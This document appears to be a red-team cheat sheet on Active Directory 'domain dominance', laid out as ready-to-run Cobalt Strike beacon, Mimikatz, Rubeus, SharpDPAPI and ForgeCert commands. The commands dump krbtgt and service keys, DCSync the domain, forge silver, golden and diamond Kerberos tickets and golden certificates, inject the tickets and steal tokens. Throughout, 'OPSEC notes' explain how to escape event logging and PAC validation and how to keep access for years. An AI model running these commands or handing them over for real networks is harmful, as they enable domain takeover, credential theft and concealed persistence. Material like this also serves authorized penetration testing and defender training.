# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - Machine certificates provide SYSTEM-level persistence
# - Survives reimaging if certificate backed up
# - Machine certificates typically have longer validity (2-5 years)
# - Very stealthy (legitimate computers use certificates)
Domain Dominance Techniques#
Service Requirements for Tickets#
Common services for Kerberos ticket-based access:
- CIFS (cifs/target.corp.local): File access, remote admin shares
- HOST (host/target.corp.local): Multiple services, WMI, PSRemoting
- HTTP (http/target.corp.local): Web services, WinRM over HTTPS
- LDAP (ldap/dc.corp.local): Directory access, DCSync
- RPCSS (rpcss/target.corp.local): RPC services, DCOM
- WSMAN (wsman/target.corp.local): WinRM/PowerShell remoting
- MSSQLSvc (MSSQLSvc/target.corp.local:1433): SQL Server access
Silver Ticket (Offline Service Ticket Forgery)#
Usage: Create service-specific tickets without contacting the DC.
# ===== PREREQUISITE: OBTAIN SERVICE ACCOUNT KEYS =====
# Extract Kerberos encryption keys (requires local admin on target service host)
beacon> mimikatz !sekurlsa::ekeys
# Look for service account or computer account keys:
# - AES256 (preferred for OPSEC)
# - AES128
# - RC4 (NTLM hash)
# ===== SILVER TICKET CREATION =====
# Method 1: Create silver ticket for CIFS service (file access)
PS C:\> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:cifs/srv01.corp.local /aes256:<aes256_key> /user:Administrator /domain:corp.local /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap
# Method 2: Silver ticket for HTTP service (WinRM)
PS C:\> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:http/srv01.corp.local /aes256:<aes256_key> /user:Administrator /domain:corp.local /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap
# Method 3: Silver ticket for LDAP (DC access)
PS C:\> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:ldap/dc01.corp.local /aes256:<aes256_key> /user:Administrator /domain:corp.local /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap
# Method 4: Using Mimikatz (alternative)
beacon> mimikatz kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-569305411-121244042-2357301523 /target:srv01.corp.local /service:cifs /aes256:<aes256_key> /ptt
# ===== TICKET INJECTION =====
# Create sacrificial logon and inject ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:CORP /username:Administrator /password:FakePass /ticket:doIFXD[...]MuaW8=
# Steal token from sacrificial process
beacon> steal_token <pid>
# Verify access to specific service
beacon> ls \\srv01.corp.local\C$
# For WinRM
beacon> powerpick Invoke-Command -ComputerName srv01.corp.local -ScriptBlock {hostname}
# For LDAP (DCSync)
beacon> dcsync corp.local CORP\Administrator
# Cleanup
beacon> rev2self
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - Silver tickets are service-specific (limited scope)
# - No contact with DC (fully offline forgery)
# - Valid until service password changes
# - Service account password changes are rare (months/years)
# - PAC validation can detect forged tickets if enforced
# - Use AES256 keys for better OPSEC (RC4 is deprecated)
# - Event ID 4769 (TGS request) NOT generated (offline ticket)
# - Event ID 4624 (logon) may occur when ticket used
Golden Ticket (Offline TGT Forgery)#
Usage: Create domain-wide TGT tickets using krbtgt account hash.
# ===== PREREQUISITE: OBTAIN KRBTGT HASH =====
# Method 1: DCSync (requires replication rights)
beacon> dcsync corp.local CORP\krbtgt
# Method 2: Extract from DC locally (requires DA/SYSTEM on DC)
beacon> mimikatz !lsadump::lsa /inject /name:krbtgt
# Output includes:
# - NTLM hash (RC4)
# - AES128 key
# - AES256 key (preferred)
# ===== GOLDEN TICKET CREATION =====
# Create golden ticket offline (on attack machine)
PS C:\> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:<krbtgt_aes256> /user:Administrator /domain:corp.local /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap
# Create golden ticket for non-existent user (domain admin)
PS C:\> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:<krbtgt_aes256> /user:FakeAdmin /domain:corp.local /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap
# Add custom groups to PAC (e.g., 512=Domain Admins, 519=Enterprise Admins)
PS C:\> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:<krbtgt_aes256> /user:Administrator /domain:corp.local /sid:S-1-5-21-569305411-121244042-2357301523 /groups:512,519,520 /nowrap
# Create with extended lifetime (default 10 years)
PS C:\> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:<krbtgt_aes256> /user:Administrator /domain:corp.local /sid:S-1-5-21-569305411-121244042-2357301523 /startoffset:-10 /endin:43200 /renewmax:10080 /nowrap
# Using Mimikatz (alternative)
beacon> mimikatz kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-569305411-121244042-2357301523 /aes256:<krbtgt_aes256> /ptt
# ===== TICKET INJECTION =====
# Inject golden ticket into new logon session
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:CORP /username:Administrator /password:FakePass /ticket:doIFLz[...]MuaW8=
# Steal token
beacon> steal_token <pid>
# Verify access
beacon> shell klist
beacon> ls \\dc01.corp.local\C$
beacon> dcsync corp.local CORP\krbtgt
# Cleanup
beacon> rev2self
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - Golden tickets provide domain-wide access
# - Valid until krbtgt password changed (typically twice: current + previous)
# - krbtgt password changes are VERY rare (manual process)
# - Forged TGT works for all services (most powerful ticket)
# - No DC contact required (fully offline)
# - PAC validation can detect forged tickets if enabled
# - Use AES256 for better OPSEC (matches modern Windows)
# - Anomalous account usage detected by behavior analytics
# - Event ID 4768 (TGT request) NOT generated (offline)
# - Event ID 4769 (TGS request) generated when requesting service tickets
# - Event ID 4624 (logon) when accessing resources
# - Lifetime anomalies may trigger alerts (10-year tickets suspicious)
Diamond Ticket (Online TGT Modification)#
Usage: Create more legitimate-looking tickets by modifying real TGT.
# ===== PREREQUISITE: OBTAIN KRBTGT KEY AND USER SID =====
# Get krbtgt AES256 key
beacon> dcsync corp.local CORP\krbtgt
# Get target user SID and user ID (RID)
beacon> powerpick Get-DomainUser -Identity Administrator | select samaccountname,objectsid
# Extract RID from SID (last part)
# Example: S-1-5-21-569305411-121244042-2357301523-500
# RID = 500
# ===== DIAMOND TICKET CREATION =====
# Request real TGT, then modify it to add privileges
# Method 1: Using /tgtdeleg (requests delegated TGT, then modifies)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /krbkey:<krbtgt_aes256> /nowrap
# Method 2: Specify existing TGT to modify
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:jdoe /ticketuserid:1106 /groups:512,519 /krbkey:<krbtgt_aes256> /nowrap
# Advanced: Inject SID history for cross-domain attacks
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-2594061375-675613155-814674916-512 /krbkey:<krbtgt_aes256> /nowrap
# ===== INJECT TICKET =====
# Create logon session with diamond ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:CORP /username:Administrator /password:FakePass /ticket:doIFYj[...]MuSU8=
beacon> steal_token <pid>
# ===== COMPARE WITH GOLDEN TICKET =====
# Describe diamond ticket (shows real TGT structure)
PS C:\> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe describe /ticket:doIFYj[...]MuSU8=
# Diamond tickets have:
# - Real enc-part (encrypted correctly by KDC)
# - Modified PAC (includes injected groups)
# - Correct timestamps and nonces
# - Proper ticket structure
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - Diamond tickets are more legitimate than golden tickets
# - Encryption is real (from KDC), only PAC is modified
# - Harder to detect with PAC validation
# - Requires initial TGT request (generates Event ID 4768)
# - Better for evading modern detection systems
# - Use when golden tickets are detected/blocked
# - Still requires krbtgt key (same prerequisite as golden)
Forged Certificates (Golden Certificate)#
Usage: Create malicious certificates using stolen CA private keys.
# ===== PREREQUISITE: EXTRACT CA PRIVATE KEY =====
# Must be executed on CA server or DC with CA role
# Requires SYSTEM privileges
# Export CA certificates and private keys
beacon> execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe certificates /machine
# Output includes:
# - Certificate (Base64)
# - Private Key (Base64)
# Alternative: Use Mimikatz
beacon> mimikatz !crypto::capi
beacon> mimikatz !crypto::cng
# Alternative: Certipy (Linux)
$ proxychains certipy ca -u Administrator -p password -target dc01.corp.local -ca corp-DC-CA -backup
# ===== CERTIFICATE CONVERSION =====
# Save certificate and private key to cert.pem
# Convert to PFX format
$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out ca.pfx
# Enter password (e.g., "pass123")
# ===== FORGE CERTIFICATE FOR TARGET USER =====
# Use ForgeCert to create malicious certificate
PS C:\> C:\Tools\ForgeCert\ForgeCert\bin\Release\ForgeCert.exe --CaCertPath .\ca.pfx --CaCertPassword pass123 --Subject "CN=User" --SubjectAltName "Administrator@corp.local" --NewCertPath .\forged.pfx --NewCertPassword pass123
# Alternative: Specify UPN
PS C:\> C:\Tools\ForgeCert\ForgeCert\bin\Release\ForgeCert.exe --CaCertPath .\ca.pfx --CaCertPassword pass123 --Subject "CN=User" --SubjectAltName "domain-admin@corp.local" --NewCertPath .\forged-da.pfx --NewCertPassword pass123
# Advanced: Forge for computer account
PS C:\> C:\Tools\ForgeCert\ForgeCert\bin\Release\ForgeCert.exe --CaCertPath .\ca.pfx --CaCertPassword pass123 --Subject "CN=Computer" --SubjectAltName "DC01$@corp.local" --NewCertPath .\forged-dc.pfx --NewCertPassword pass123
# ===== ENCODE FORGED CERTIFICATE =====
$ cat forged.pfx | base64 -w 0
# ===== AUTHENTICATE WITH FORGED CERTIFICATE =====
# Request TGT using forged certificate
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:Administrator /domain:corp.local /enctype:aes256 /certificate:MIACAQ[...]IEAAAA /password:pass123 /nowrap
# Inject ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:CORP /username:Administrator /password:FakePass /ticket:doIFLz[...]MuaW8=
beacon> steal_token <pid>
# Verify access
beacon> ls \\dc01.corp.local\C$
beacon> dcsync corp.local CORP\krbtgt
# ===== OPSEC CONSIDERATIONS =====
# OPSEC Notes:
# - Forged certificates provide long-term access (years)
# - Requires CA private key (very difficult to obtain)
# - Certificates work even after domain password resets
# - Certificate authentication generates Event ID 4768 with cert details
# - CRL/OCSP checks may detect forged certificates if CA compromised
# - Consider certificate revocation list monitoring
# - Most powerful persistence mechanism (golden certificate)
# - Requires remediation: CA private key rotation + certificate revocation